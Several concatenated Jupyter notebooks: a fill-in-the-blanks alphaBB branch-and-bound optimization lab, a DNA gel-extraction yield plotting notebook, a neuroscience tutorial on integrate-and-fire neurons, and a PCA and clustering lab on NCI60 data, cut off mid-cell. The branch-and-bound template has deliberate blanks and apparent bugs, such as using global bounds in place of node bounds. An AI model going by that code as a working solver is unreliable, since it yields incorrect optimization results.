# <u>Task</u>: Go through the code and fill in the missing bits to complete the implementation. Missing bits are marked with the comment <i># add your code here</i>
# +
import numpy as np
# we will use a local solver from scipy for upper-bounding problem
from scipy import optimize as sp
# to construct relaxations for lower-bounding problem
from math import inf, sin, cos, sqrt
# for branching
import copy
# for plotting
import matplotlib.pyplot as plt
from mpl_toolkits import mplot3d
from matplotlib import cm
# -
# ### Objective functions, to experiment on:
# Return $f(\mathbf x)$ for input $\mathbf x$
def sixhump(x): #scipy-lectures.org/intro/scipy/auto_examples/plot_2d_minimization.html
return ((4 - 2.1*x[0]**2 + x[0]**4 / 3.) * x[0]**2 + x[0] * x[1] + (-4 + 4*x[1]**2) * x[1] **2)
def adjiman (X):
x, y = X[0], X[1]
return (np.cos(x) * np.sin(y)) - (x / (y**2.0 + 1.0))
def schwefel(x):
n = 2
s = 0
for i in range(0,n):
s = s - 1 * x[i] * sin(sqrt(abs(x[i])))
y = 418.9829 * n + s
return y
def griewank(x):
x1 = x[0]
x2 = x[1]
sum = 0
prod = 1
sum = sum + x1 ** 2 / 4000
prod = prod * np.cos(x1 / sqrt(1))
sum = sum + x2 ** 2 / 4000
prod = prod * np.cos(x2 / sqrt(2))
y = sum - prod + 1
return y
def camel3(xx):
x1 = xx[0]
x2 = xx[1]
term1 = 2*x1**2
term2 = -1.05*x1**4
term3 = x1**6 / 6
term4 = x1*x2
term5 = x2**2
return term1 + term2 + term3 + term4 + term5
# ### Compute convex relaxations using $\alpha$BB method
# Returns cv($f(\mathbf x)$), for inputs $\mathbf x,\; f(\mathbf x),\; \alpha,\; \mathbf x^L\;$and $\mathbf x^U$
def relaxedFunction(x, function, alpha, lb, ub):
# using alphaBB method
lb = np.array(lb)
ub = np.array(ub)
y = # add your code here
return y
# ### Compute upper bound for current node
# Writes "ubd" attribute of newly created nodes. Returns updated list of nodes.
def computeUpperBounds(nodes, objective):
for iNode in nodes:
if iNode["ubd"] == inf:
x0 = (np.array(iNode["lb"]) + np.array(iNode["ub"]))/2
bnds = []
for i in range(0, len(lb)):
bnds.append((lb[i], ub[i]))
solUBD = sp.minimize(objective, x0, bounds = bnds, method='L-BFGS-B', jac=None)
iNode["ubd"] = solUBD.fun
return nodes
# ### Compute lower bound for current node
# Writes "lbd" attribute of newly created nodes. Returns updated list of nodes.
def computeLowerBounds(nodes, objective, alpha):
for iNode in nodes:
if iNode["ubd"] == inf:
x0 = (np.array(iNode["lb"]) + np.array(iNode["ub"]))/2
bnds = []
for i in range(0, len(lb)):
bnds.append((iNode["lb"][i], iNode["ub"][i]))
solLBD = sp.minimize(relaxedFunction, x0, args=(objective, alpha, iNode["lb"], iNode["ub"]), bounds = bnds, method='L-BFGS-B', jac=None)
iNode["lbd"] = solLBD.fun
return nodes
# ### Branch
def branching(nodes, globalLBD):
epsilonF = 0.001
chosenNode = nodes[0]
# choose node with lowest LBD
for iNode in nodes:
if iNode["lbd"] <= globalLBD + epsilonF:
chosenNode = iNode
break
# branch on variable with largest variable bounds
delta = np.array(chosenNode["ub"]) - np.array(iNode["lb"])
indVariable = np.argmax(delta)
print("max delta: ", max(delta))
# simply branch in the middle
iNodeLeft = copy.deepcopy(chosenNode)
iNodeLeft["ub"][indVariable] = # add your code here
iNodeLeft["lbd"] = - inf
iNodeLeft["ubd"] = + inf
iNodeRight = copy.deepcopy(chosenNode)
iNodeRight["lb"][indVariable] = iNodeLeft["ub"][indVariable]
iNodeRight["lbd"] = - inf
iNodeRight["ubd"] = + inf
# bookkeeping
nodes.remove(chosenNode)
nodes.append(iNodeLeft)
nodes.append(iNodeRight)
return nodes
# ### Fathoming
# Returns true or false for given node and global upper bound.
def fathom(iNode, globalUBD):
# fathom if true
if # add your code here:
return True
else:
return False
# ### Main function
# Returns global minimum for given objective function, box constraints: $\mathbf x^L\;$and $\mathbf x^U$, and $\alpha$.
def branchAndBoundAlgorithm(objective, lb, ub, alpha):
foundGlobalSolution = False
epsilonF = 0.001 # absolute tolerance
UBD = inf
LBD = -inf
nodes = []
# initial point
x0 = (np.array(lb) + np.array(ub))/2
bnds = []
for i in range(0, len(lb)):
bnds.append((lb[i], ub[i]))
# compute upper bound
solUBD = sp.minimize(objective, x0, bounds = bnds, method='L-BFGS-B', jac=None)
# compute lower bound
solLBD = sp.minimize(relaxedFunction, x0, bounds = bnds, args=(objective, alpha, lb, ub), method='L-BFGS-B', jac=None)
# current global upper and lower bounds
UBD = solUBD.fun
LBD = solLBD.fun
# create first node
node = {
"ubd": solUBD.fun,
"lbd": solLBD.fun,
"lb": lb,
"ub": ub
}
nodes.append(node)
iteration = 0
while not foundGlobalSolution:
# convergence check
if ( UBD - LBD ) < epsilonF:
foundGlobalSolution = True
print("diff ", UBD - LBD)
print("upper bound: ", UBD, "lower bound: ", LBD)
break
iteration = iteration + 1
print("iter: ", iteration)
print("epsilionF: ", UBD-LBD, "UBD: ", UBD, "LBD: ", LBD)
# branching (on largest diameter of local variable bounds)
nodes = branching(nodes, LBD)
# compute lower bound for newly created nodes
nodes = computeLowerBounds(nodes, objective, alpha)
# compute upper bound for newly created nodes
nodes = computeUpperBounds(nodes, objective)
# update global LBD and UBD
LBD = inf
for iNode in nodes:
LBD = min(LBD, iNode["lbd"])
UBD = min(UBD, iNode["ubd"])
# fathoming
nodes[:] = [x for x in nodes if not fathom(x, UBD)]
return UBD
# ### Plot objective function and relxation for the first node
# you can ignore this cell - it's only for making nice plots
def plotFunctionAndRelaxation(function, lb, ub, alpha):
# define domain
numElem = 50
X = np.linspace(lb[0],ub[0], numElem, endpoint=True)
Y = np.linspace(lb[1],ub[1], numElem, endpoint=True)
X, Y = np.meshgrid(X, Y)
# figure
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111,projection='3d' )
# plot relaxation
zs = []
XX = np.ravel(X)
YY = np.ravel(Y)
for indX, x in enumerate(XX):
zs.append(relaxedFunction(np.array([XX[indX], YY[indX]]), function, alpha, lb, ub))
zs = np.array(zs)
ZZ = zs.reshape(X.shape)
ax.plot_wireframe(X,Y,ZZ, color='red')
# plot original function
zs = np.array(function([np.ravel(X), np.ravel(Y)])) # for normal function this might work as long as there is no vector math
Z = zs.reshape(X.shape)
# Surface plot:
plt.get_cmap('jet')
ax.plot_surface(X, Y, Z, cmap=plt.get_cmap('coolwarm'), antialiased=True)
plt.show()
# ### Solve the following global optimization problems
# +
# objective function: camel 3
lb = [-4.0, -5.0]
ub = [4.0, 5.0]
alpha = 0.5
plotFunctionAndRelaxation(camel3, lb, ub, alpha)
UBD = branchAndBoundAlgorithm(camel3, lb, ub, alpha)
# +
# objective function: adjiman
lb = [-4.0, -5.0]
ub = [4.0, 5.0]
alpha = 0.5
plotFunctionAndRelaxation(adjiman, lb, ub, alpha)
UBD = branchAndBoundAlgorithm(adjiman, lb, ub, alpha)
# -
# objective function: griewank
lb = [-5.0, -5.0]
ub = [3.0, 3.0]
alpha = 0.4
plotFunctionAndRelaxation(griewank, lb, ub, alpha)
UBD = branchAndBoundAlgorithm(griewank, lb, ub, alpha)
|
EngineeringOptimization/GitLab/Lab10.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Visualizations of pFC PCR and pFC9 digest agarose gel DNA extraction results
import pandas as pd
import rpy2
# %load_ext rpy2.ipython
# Read dataframe with nanodrop results.
nanodrop = pd.read_csv('../tables/nanodrop_pFC_pcrs_and_digests.csv', sep='|') # pipe delim due to markdown
# Clean data.
nanodrop_trim = nanodrop.apply(lambda x: x.str.strip() if x.dtype == "object" else x)
nanodrop_trim
# Plot data using ggplot2.
# + magic_args="-i nanodrop_trim" language="R"
# library(ggplot2)
# library(ggpubr)
# library(RColorBrewer)
#
# colnames(nanodrop_trim)
# -
# Format column names because they are wack.
# + magic_args="-i nanodrop_trim " language="R"
# nano.df <- nanodrop_trim
# colnames(nano.df) <- c(
# 'Sample_name', 'Sample_number', 'ng_per_ul',
# 'protein_ratio', 'salt_ratio', 'Date', 'Assay'
# )
# + magic_args="-w 12 -h 8 --units in" language="R"
#
# ggplot(nano.df, aes(x=Date, y=ng_per_ul, fill=Date)) + geom_boxplot() +
# facet_wrap(~Assay) + theme_pubr() + labs(
# y='ng/ul DNA', title='Agarose gel extraction yields'
# ) + scale_fill_brewer(palette='Dark2') +
# theme(text = element_text(size = 14))
# + magic_args="-w 12 -h 8 --units in" language="R"
#
# # ideal protein ratio value = 1.8
# # ideal salt ratio value >= 2
#
# # https://toptipbio.com/the-nanodrop-results-explained/
#
#
# ratios <- ggplot(nano.df, aes(x=protein_ratio, y=salt_ratio, color=Date, size=ng_per_ul)) +
# geom_point() +
# facet_wrap(~Assay) + theme_pubr() +
# scale_color_brewer(palette='Dark2') +
# labs(x='260/280', y='260/230') + theme(text = element_text(size = 14))
# ratios
# -
# Overall shows both salt and protein contamination.
# Add visualization of ideal ratio ranges.
# + magic_args="-w 12 -h 8 --units in" language="R"
#
# ratios + annotate("rect", xmin = 0, xmax = 4, ymin = -0.5, ymax = 3,
# alpha = .2, fill='red') +
# annotate("rect", xmin = 0, xmax = 2.75, ymin = 1.65, ymax = 3,
# alpha = .2, fill='yellow') +
# annotate("rect", xmin = 0, xmax = 1.8, ymin = 2, ymax = 3,
# alpha = .2, fill='green')
#
# -
# ## 8-17-21 Extractions
nanodrop_8_17 = pd.read_csv('../tables/pFC9_LF_agarose_gel_extract_8-17-21.csv', sep=',')
nanodrop_8_17
all_nano = nanodrop.append(nanodrop_8_17, ignore_index=True)
all_nano
# Turn graphing scripts into functions.
# + language="R"
#
# rename_ratios <- function(df){
# # rename table columns as having / in column names (for nanodrop ratios) causes issues
#
# nano.df <- df
# colnames(nano.df) <- c(
# 'Sample_name', 'Sample_number', 'ng_per_ul',
# 'protein_ratio', 'salt_ratio', 'Date', 'Assay'
# )
# nano.df
# }
# + language="R"
#
# plot_nano_points <- function(nano.df){
#
# ggplot(nano.df, aes(x=protein_ratio, y=salt_ratio, color=Date, size=ng_per_ul)) +
# geom_point() +
# facet_wrap(~Assay) + theme_pubr() +
# scale_color_brewer(palette='Dark2') +
# labs(x='260/280', y='260/230') + theme(text = element_text(size = 14)) +
# theme(
# plot.title = element_text(color="black", size=18, face="bold"),
# axis.title.x = element_text(color="black", size=18, face="bold"),
# axis.title.y = element_text(color="black", size=18, face="bold"),
# axis.text.y = element_text(color="black", size=16, face="bold"),
# axis.text.x = element_text(color="black", size=16, face="bold"),
# strip.text = element_text(color="black", size=14, face="bold")
# )
#
# }
# -
# Plot all nanodrop agaorse gel extraction data to date.
# + magic_args="-i all_nano -w 12 -h 8 --units in" language="R"
#
# all_nano.rename <- rename_ratios(all_nano)
# plot_nano_points(all_nano.rename)
# + magic_args="-i all_nano -w 12 -h 7 --units in" language="R"
#
# barbplot_yields <- function(nano.df){
# all_nano.rename <- rename_ratios(nano.df)
# agg.df.mean <- aggregate(all_nano.rename[, c('ng_per_ul')], list(all_nano.rename$Date, all_nano.rename$Assay), mean)
# agg.df.sd <- aggregate(all_nano.rename[, c('ng_per_ul')], list(all_nano.rename$Date, all_nano.rename$Assay), sd)
# agg.df <- agg.df.mean
# agg.df$sd <- agg.df.sd$x
#
# ggplot(agg.df, aes(x=Group.1, y=x, fill=Group.1)) + geom_bar(stat='identity', color='black', size=1) +
# geom_errorbar( aes(x=Group.1, ymin=x-sd, ymax=x+sd), width=0.4, colour="black", size=1) +
# facet_wrap(~Group.2) +
# scale_color_brewer(palette='Dark2') + theme_pubr() +
# labs(y='DNA (ng / ul)', x='Date') + theme(legend.position = "none") +
# theme(
# plot.title = element_text(color="black", size=18, face="bold"),
# axis.title.x = element_text(color="black", size=18, face="bold"),
# axis.title.y = element_text(color="black", size=18, face="bold"),
# axis.text.y = element_text(color="black", size=16, face="bold"),
# axis.text.x = element_text(color="black", size=16, face="bold"),
# strip.text = element_text(color="black", size=14, face="bold")
# ) +
# coord_flip()
# }
#
# barbplot_yields(all_nano)
|
experiments/VR-inserts/notebooks/.ipynb_checkpoints/Agarose_gel_extractions-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W1D1_ModelTypes/student/W1D1_Tutorial2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text" id="HwYPw4CvrYCV"
# # NMA Model Types Tutorial 2: "How" models
#
# In this tutorial we will explore models that can potentially explain *how* the spiking data we have observed is produced. That is, the models will tell us something about the *mechanism* underlying the physiological phenomenon.
#
# Our objectives:
# - Write code to simulate a simple "leaky integrate-and-fire" neuron model
# - Make the model more complicated — but also more realistic — by adding more physiologically-inspired details
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" id="nfdfxF_ee8sZ" outputId="26bd0ee4-4ac1-45b3-d75c-2425ac20a06b"
#@title Video: "How" models
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='yWPQsBud4Cc', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# + [markdown] colab_type="text" id="yQN8ug6asey4"
# ## Setup
#
# **Don't forget to execute the hidden cells!**
# + cellView="form" colab={} colab_type="code" id="w6RPNLB6rYCW"
#@title Imports
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats as stats
import ipywidgets as widgets
# + cellView="form" colab={} colab_type="code" id="CK1bXaOgrYCZ"
#@title Helper Functions
def histogram(counts, bins, vlines=(), ax=None, ax_args=None, **kwargs):
"""Plot a step histogram given counts over bins."""
if ax is None:
_, ax = plt.subplots()
# duplicate the first element of `counts` to match bin edges
counts = np.insert(counts, 0, counts[0])
ax.fill_between(bins, counts, step="pre", alpha=0.4, **kwargs) # area shading
ax.plot(bins, counts, drawstyle="steps", **kwargs) # lines
for x in vlines:
ax.axvline(x, color='r', linestyle='dotted') # vertical line
if ax_args is None:
ax_args = {}
# heuristically set max y to leave a bit of room
ymin, ymax = ax_args.get('ylim', [None, None])
if ymax is None:
ymax = np.max(counts)
if ax_args.get('yscale', 'linear') == 'log':
ymax *= 1.5
else:
ymax *= 1.1
if ymin is None:
ymin = 0
if ymax == ymin:
ymax = None
ax_args['ylim'] = [ymin, ymax]
ax.set(**ax_args)
ax.autoscale(enable=False, axis='x', tight=True)
def plot_neuron_stats(v, spike_times):
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(12, 5))
# membrane voltage trace
ax1.plot(v[0:100])
ax1.set(xlabel='Time', ylabel='Voltage')
# plot spike events
for x in spike_times:
if x >= 100:
break
ax1.axvline(x, color='limegreen')
# ISI distribution
isi = np.diff(spike_times)
n_bins = bins = np.arange(isi.min(), isi.max() + 2) - .5
counts, bins = np.histogram(isi, bins)
vlines = []
if len(isi) > 0:
vlines = [np.mean(isi)]
xmax = max(20, int(bins[-1])+5)
histogram(counts, bins, vlines=vlines, ax=ax2, ax_args={
'xlabel': 'Inter-spike interval',
'ylabel': 'Number of intervals',
'xlim': [0, xmax]
})
# + [markdown] colab_type="text" id="kOxLk8AvrYCe"
# ## The Linear Integrate-and-Fire Neuron
#
# One of the simplest models of spiking neuron behavior is the linear integrate-and-fire model neuron. In this model, the neuron increases its membrane potential $V_m$ over time in response to excitatory input currents $I$ scaled by some factor $\alpha$:
#
# \begin{align}
# dV_m = {\alpha}I
# \end{align}
#
# Once $V_m$ reaches a threshold value of 1, a spike is emitted, the neuron resets $V_m$ back to 0, and the process continues.
#
# #### Spiking Inputs
#
# We now have a model for the neuron dynamics. Next we need to consider what form the input $I$ will take. How should we represent the presynaptic neuron firing behavior providing the input coming into our model nueuron? We learned previously that a good approximation of spike timing is a Poisson random variable, so we can do that here as well
#
# \begin{align}
# I \sim Poisson(\lambda)
# \end{align}
#
# where $\lambda$ is the average rate of incoming spikes.
# + [markdown] colab_type="text" id="Ls8CsM2Pf7LQ"
# ### Exercise: Compute $dV_m$
#
# For your first exercise, you will write the code to compute the change in voltage $dV_m$ of the linear integrate-and-fire model neuron. The rest of the code to handle the neuron dynamics are provided for you, so you just need to fill in a definition for `dv` in the `lif_neuron` method below. The value for $\lambda$ needed for the Poisson random variable is named `rate`.
#
# TIP: The [`scipy.stats`](https://docs.scipy.org/doc/scipy/reference/stats.html) package is a great resource for working with and sampling from various probability distributions.
# + colab={} colab_type="code" id="HQU61YUDrYCe"
def lif_neuron(n_steps=1000, alpha=0.01, rate=10):
""" Simulate a linear integrate-and-fire neuron.
Args:
n_steps (int): The number of time steps to simulate the neuron's activity.
alpha (float): The input scaling factor
rate (int): The mean rate of incoming spikes
"""
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
#######################################################################
## TODO for students: compute dv, then remove the NotImplementedError #
#######################################################################
# dv = ...
raise NotImplementedError("Student excercise: compute the change in membrane potential")
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
# Uncomment these lines after completing the lif_neuron function
# v, spike_times = lif_neuron()
# plot_neuron_stats(v, spike_times)
# + [markdown] cellView="both" colab={"base_uri": "https://localhost:8080/", "height": 340} colab_type="text" id="u-oCuaFAiRi5" outputId="3e4c9e97-cd68-4b4a-d346-4baea254e082"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W1D1_ModelTypes/solutions/W1D1_Tutorial2_Solution_f0c3783f.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=749 height=331 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W1D1_ModelTypes/static/W1D1_Tutorial2_Solution_f0c3783f_0.png>
#
#
# + [markdown] colab_type="text" id="V9xEZVAHr5Kv"
# ### Parameter Exploration
#
# Here's an interactive demo that shows how the model behavior changes for different parameter values.
#
# **Remember to enable the demo by running the cell.**
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 430, "referenced_widgets": ["ceba379285d8420eab122d92e37cf614", "ce36febaaf2d4393b40ea270eea78bda", "335dc79d7de5472b8feab6962ba2c5d8", "f03f445c87fd41daa39efbe68c55afe6", "91bbca9d32e44b579f90cc2c57af6162", "1251eebb98c44304bb2b44b5967e04ed", "13178c66d344425e8033ccb71d5952cd", "bfbb00cee53142b0be230d2911200e78", "98600f1df3694f7f8f395241786bf8ec", "<KEY>", "<KEY>", "<KEY>", "cb20954f9e4e40189e7517984d429f9e"]} colab_type="code" id="RRjD0G3nrYCh" outputId="f1ca24c3-098d-4482-d39e-8dd705d6b790"
#@title Linear Integrate-and-Fire Model Neuron Explorer
def _lif_neuron(n_steps=1000, alpha=0.01, rate=10):
exc = stats.poisson(rate).rvs(n_steps)
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
dv = alpha * exc[i]
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
@widgets.interact(
n_steps=widgets.FloatLogSlider(1000.0, min=2, max=4),
alpha=widgets.FloatLogSlider(0.01, min=-4, max=-1),
rate=widgets.IntSlider(10, min=1, max=20)
)
def plot_lif_neuron(n_steps=1000, alpha=0.01, rate=10):
v, spike_times = _lif_neuron(int(n_steps), alpha, rate)
plot_neuron_stats(v, spike_times)
# + [markdown] colab_type="text" id="91UgFMVPrYCk"
# ## Inhibitory signals
#
# Our linear integrate-and-fire neuron from the previous section was indeed able to produce spikes, but the actual spiking behavior did not line up with our expectations of exponentially distributed ISIs. This means we need to refine our model!
#
# In the previous model we only considered excitatory behavior -- the only way the membrane potential could decrease is upon a spike event. We know, however, that there are other factors that can drive $V_m$ down. First is the natural tendancy of the neuron to return to some steady state or resting potential. We can update our previous model as follows:
#
# \begin{align}
# dV_m = -{\beta}V_m + {\alpha}I
# \end{align}
#
# where $V_m$ is the current membrane potential and $\beta$ is some leakage factor. This is a basic form of the popular Leaky Integrate-and-Fire model neuron (for a more detailed discussion of the LIF Neuron, see the Appendix).
#
# We also know that in addition to excitatory presynaptic neurons, we can have inhibitory presynaptic neurons as well. We can model these inhibitory neurons with another Poisson random variable, giving us
#
# \begin{align}
# I = I_{exc} - I_{inh} \\
# I_{exc} \sim Poisson(\lambda_{exc}) \\
# I_{inh} \sim Poisson(\lambda_{inh})
# \end{align}
#
# where $\lambda_{exc}$ and $\lambda_{inh}$ are the rates of the excitatory and inhibitory presynaptic neurons, respectively.
# + [markdown] colab_type="text" id="3tErnV24y_Pa"
# ### Exercise: Compute $dV_m$ with inhibitory signals
#
# For your second exercise, you will again write the code to compute the change in voltage $dV_m$, though now of the LIF model neuron described above. Like last time, the rest of the code needed to handle the neuron dynamics are provided for you, so you just need to fill in a definition for `dv` below.
#
# + colab={} colab_type="code" id="RfT7XE_UzUUl"
def lif_neuron_inh(n_steps=1000, alpha=0.5, beta=0.1, exc_rate=10, inh_rate=10):
""" Simulate a simplified leaky integrate-and-fire neuron with both excitatory
and inhibitory inputs.
Args:
n_steps (int): The number of time steps to simulate the neuron's activity.
alpha (float): The input scaling factor
beta (float): The membrane potential leakage factor
exc_rate (int): The mean rate of the incoming excitatory spikes
inh_rate (int): The mean rate of the incoming inhibitory spikes
"""
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
############################################################
## Students: compute dv and remove the NotImplementedError #
############################################################
# dv = ...
raise NotImplementedError("Student excercise: compute the change in membrane potential")
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
# Uncomment these lines do make the plot once you've completed the function
# v, spike_times = lif_neuron_inh()
# plot_neuron_stats(v, spike_times)
# + [markdown] cellView="both" colab={} colab_type="text" id="opfSK1CrrYCk"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W1D1_ModelTypes/solutions/W1D1_Tutorial2_Solution_da94ffb5.py)
#
#
# + colab={"base_uri": "https://localhost:8080/", "height": 334} colab_type="code" id="66msnOg2_R65" outputId="ec69c319-9c78-4358-fc2b-c5150b461da7"
v, spike_times = lif_neuron_inh()
plot_neuron_stats(v, spike_times)
# + [markdown] colab_type="text" id="wTiAaeX4zuhn"
# ### Parameter Exploration
#
# Like last time, you can now explore how you LIF model behaves when the various parameters of the system are changed.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 494, "referenced_widgets": ["0f09df3ceeae48a387d0fc6b908b5567", "<KEY>", "9fd68b3ef90242d2ba97505ca56114aa", "e3b2afface834d268c55d859f854e908", "967e42b786084dd8b7ec89d0e629092d", "7c579a4e4e234f36ae753e4cc9836579", "cc9589e5f00c42cc964af4172428c827", "<KEY>", "ff7ab8e46044463c94adef7cd4b67fea", "9735482f9bcd40b9926801e91ba8d4ce", "f8c107c262754347abba720716fb0f42", "<KEY>", "40394324c52e4e1298dc5e745a1f1d0f", "<KEY>", "<KEY>", "<KEY>", "10565e172d4e453b9305557675df1e8f", "<KEY>", "5dd8a2dc5f954ad8ba909fe7849ba815"]} colab_type="code" id="Eh3wR_nArYCn" outputId="fd0b6976-8a39-42ce-a77f-a61278d30689"
#@title LIF Model Neuron with Inhibitory Inputs Explorer
def _lif_neuron_inh(n_steps=1000, alpha=0.5, beta=0.1, exc_rate=10, inh_rate=10):
""" Simulate a simplified leaky integrate-and-fire neuron with both excitatory
and inhibitory inputs.
Args:
n_steps (int): The number of time steps to simulate the neuron's activity.
alpha (float): The input scaling factor
beta (float): The membrane potential leakage factor
exc_rate (int): The mean rate of the incoming excitatory spikes
inh_rate (int): The mean rate of the incoming inhibitory spikes
"""
# precompute Poisson samples for speed
exc = stats.poisson(exc_rate).rvs(n_steps)
inh = stats.poisson(inh_rate).rvs(n_steps)
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
dv = -beta * v[i-1] + alpha * (exc[i] - inh[i])
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
@widgets.interact(n_steps=widgets.FloatLogSlider(1000.0, min=2, max=4),
alpha=widgets.FloatLogSlider(0.5, min=-2, max=1),
beta=widgets.FloatLogSlider(0.1, min=-2, max=0),
exc_rate=widgets.IntSlider(10, min=1, max=20),
inh_rate=widgets.IntSlider(10, min=1, max=20))
def plot_lif_neuron(n_steps=1000, alpha=0.5, beta=0.1, exc_rate=10, inh_rate=10):
v, spike_times = _lif_neuron_inh(int(n_steps), alpha, beta, exc_rate, inh_rate)
plot_neuron_stats(v, spike_times)
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" id="or1Tt4TSfQwp" outputId="6354a165-972d-4834-f507-ada332fb423f"
#@title Video: Balanced inputs
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='buXEQPp9LKI', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# + [markdown] colab_type="text" id="pKCzc7Fjz8zK"
# ## Appendix
# + [markdown] colab_type="text" id="xn34Ieffz_ZO"
# ### Why do neurons spike?
#
# A neuron stores energy in an electric field across its cell membrane, by controlling the distribution of charges (ions) on either side of the membrane. This energy is rapidly discharged to generate a spike when the field potential (or membrane potential) crosses a threshold. The membrane potential may be driven toward or away from this threshold, depending on inputs from other neurons: excitatory or inhibitory, respectively. The membrane potential tends to revert to a resting potential, for example due to the leakage of ions across the membrane, so that reaching the spiking threshold depends not only on the amount of input ever received following the last spike, but also the timing of the inputs.
#
# The storage of energy by maintaining a field potential across an insulating membrane can be modeled by a capacitor. The leakage of charge across the membrane can be modeled by a resistor. This is the basis for the leaky integrate-and-fire neuron model.
# + [markdown] colab_type="text" id="pwZOhsV60WPM"
# ### The LIF Model Neuron
#
# The full equation for the LIF neuron is
#
# \begin{align}
# C_{m}\frac{dV_m}{dt} = -(V_m - V_{rest})/R_{m} + I
# \end{align}
#
# where $C_m$ is the membrane capacitance, $R_M$ is the membrane resistance, $𝑉_{𝑟𝑒𝑠𝑡}$ is the resting potential, and 𝐼 is some input current (from other neurons, an electrode, ...).
#
# In our above examples we set many of these properties to convenient values ($C_m = R_m = dt = 1$, $V_{rest} = 0$) to focus more on the overall behavior, though these too can be manipulated to achieve different dynamics.
|
tutorials/W1D1_ModelTypes/student/W1D1_Tutorial2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
# imports and setup
# %matplotlib inline
import numpy as np
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
pd.set_option('precision', 4) # number precision for pandas
pd.set_option('display.max_rows', 50)
pd.set_option('display.max_columns', 20)
pd.set_option('display.float_format', '{:20,.4f}'.format) # get rid of scientific notation
plt.style.use('seaborn') # pretty matplotlib plots
# +
nci60 = pd.read_csv('../datasets/NCI60.csv', index_col=0)
nci_labs = nci60.labs
nci_data = nci60.drop('labs', axis=1)
nci_data.head()
# -
nci_labs.head()
nci_labs.value_counts()
# # 10.6.1 PCA on the NCI60 Data
# +
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
nci_scaled = scaler.fit_transform(nci_data)
pca = PCA()
pca.fit(nci_scaled)
# -
x = pca.transform(nci_scaled)
# +
from sklearn.preprocessing import LabelEncoder
le = LabelEncoder()
color_index = le.fit_transform(nci_labs)
# +
f, axes = plt.subplots(1, 2, sharex=False, sharey=False)
f.set_figheight(8)
f.set_figwidth(16)
axes[0].scatter(x[:, 0], -x[:, 1], c=color_index, cmap='Spectral')
axes[0].set_xlabel('Z1')
axes[0].set_ylabel('Z2')
axes[1].scatter(x[:, 0], x[:, 2], c=color_index, cmap='Spectral')
axes[1].set_xlabel('Z1')
axes[1].set_ylabel('Z3');
# -
pca.explained_variance_ratio_[:5]
pca.explained_variance_ratio_.cumsum()[:5]
# +
from scikitplot.decomposition import plot_pca_component_variance
f, axes = plt.subplots(1, 2, sharex=False, sharey=False)
f.set_figheight(6)
f.set_figwidth(14)
axes[0].plot(pca.explained_variance_ratio_, marker='o', markeredgewidth=1, markerfacecolor='None')
axes[0].set_title('PVE')
plot_pca_component_variance(pca, ax=axes[1]);
# -
# # 10.6.2 Clustering the Observations of the NCI60 Data
# +
from scipy.cluster.hierarchy import dendrogram, linkage, cut_tree
f, axes = plt.subplots(3, 1, sharex=False, sharey=False)
f.set_figheight(24)
f.set_figwidth(16)
dendrogram(linkage(nci_scaled, method='complete'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6,
ax=axes[0])
dendrogram(linkage(nci_scaled, method='average'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6,
ax=axes[1])
dendrogram(linkage(nci_scaled, method='single'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6,
ax=axes[2])
axes[0].set_title('Complete Linkage', size=16)
axes[1].set_title('Average Linkage', size=16)
axes[2].set_title('Single Linkage', size=16);
# +
hc_clusters = cut_tree(linkage(nci_scaled, method='complete'), 4).ravel()
pd.crosstab(hc_clusters, nci_labs)
# +
plt.figure(figsize=(16, 10))
dendrogram(linkage(nci_scaled, method='complete'),
labels=nci_labs,
leaf_rotation=90,
leaf_font_size=6)
plt.axhline(y=139, c='r')
plt.title('Complete Linkage', size=16);
# +
from sklearn.cluster import KMeans
km = KMeans(n_clusters=4, n_init=20, random_state=42)
km.fit(nci_scaled)
pd.crosstab(km.labels_, hc_clusters)
# +
hc2 = linkage(x[:, 0:5], method='complete')
plt.figure(figsize=(16, 10))
dendrogram(hc2,
